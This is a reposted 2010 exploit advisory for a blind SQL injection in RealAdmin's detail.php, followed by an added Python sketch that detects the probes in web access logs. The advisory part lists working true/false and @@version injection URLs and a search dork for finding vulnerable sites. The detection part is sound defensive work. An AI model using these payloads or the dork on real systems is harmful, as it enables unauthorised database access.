RealAdmin – ‘detail.php’ Blind SQL Injection

  • Author: AtT4CKxT3rR0r1ST
    Date: 2010-02-03
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/11325/
  • RealAdmin (detail.php) Blind Sql Injection Vulnerability
    ========================================================
    
    ####################################################################
    .:. Author : AtT4CKxT3rR0r1ST[F.Hack@w.cn]
    .:. Team : Sec Attack Team
    .:. Home : www.sec-attack.com/vb
    .:. Script : RealAdmin
    .:. Download Script: http://www.redcow.ca/products/realadmin/
    .:. Bug Type : Blind Sql Injection
    .:. Dork : "Powered by RealAdmin and Red Cow Technologies, Inc."
    
    ####################################################################
    
    ===[ Exploit ]===
    
    www.site.com/detail.php?id=[Blind SQL INJECTION]
    
    
    www.site.com/detail.php?id=NULL+and+1=1 >>> True
    www.site.com/detail.php?id=NULL+and+1=2 >>> False
    
    
    www.site.com/detail.php?id=NULL+and+substring(@@version,1,1)=5 >>> True
    www.site.com/detail.php?id=NULL+and+substring(@@version,1,1)=4 >>> False
    
    
    ####################################################################
    
    Greats T0: HackxBack & Zero Cold & All My Friend & All Member Sec Attack
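
Detection sketch for the true/false and @@version probes listed above, as an added example that is not part of the original advisory or of RealAdmin. The log lines, IP addresses and the function names classify, scan and paired_probers are constructed for illustration; it assumes combined-format web access logs.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [03/Feb/2010:10:00:01 +0000] "GET /detail.php?id=42 HTTP/1.1" 200 5120
198.51.100.9 - - [03/Feb/2010:10:00:05 +0000] "GET /detail.php?id=NULL+and+1=1 HTTP/1.1" 200 5120
198.51.100.9 - - [03/Feb/2010:10:00:06 +0000] "GET /detail.php?id=NULL+and+1=2 HTTP/1.1" 200 310
198.51.100.9 - - [03/Feb/2010:10:00:09 +0000] "GET /detail.php?id=NULL%20AND%20substring(@@version,1,1)=5 HTTP/1.1" 200 5120
203.0.113.7 - - [03/Feb/2010:10:00:12 +0000] "GET /index.php?id=7 HTTP/1.1" 200 900
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) ')
# Patterns taken from the probes shown in the advisory.
BOOLEAN_RE = re.compile(r'\band\s+(\d+)\s*=\s*(\d+)', re.I)
VERSION_RE = re.compile(r'substring\s*\(\s*@@version', re.I)

def classify(value):
    """Return labels for one decoded id value; an empty set means a plain integer id."""
    if re.fullmatch(r'\d+', value):
        return set()
    labels = {"non-numeric-id"}
    if VERSION_RE.search(value):
        labels.add("version-probe")
    m = BOOLEAN_RE.search(value)
    if m:
        labels.add("bool-true" if m.group(1) == m.group(2) else "bool-false")
    return labels

def scan(log_text, script="/detail.php"):
    """Map client IP -> labels seen in id= values sent to the given script."""
    findings = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or urlsplit(m.group(2)).path != script:
            continue
        query = urlsplit(m.group(2)).query
        for value in parse_qs(query, keep_blank_values=True).get("id", []):
            findings[m.group(1)] |= classify(value)
    return {ip: labels for ip, labels in findings.items() if labels}

def paired_probers(findings):
    """Clients that sent both a true and a false condition: the blind-SQLi signature."""
    return sorted(ip for ip, l in findings.items() if {"bool-true", "bool-false"} <= l)

if __name__ == "__main__":
    print(paired_probers(scan(SAMPLE_LOG)))
```

Any non-numeric id reaching detail.php is worth alerting on by itself; the paired true/false check separates deliberate boolean probing from stray malformed links.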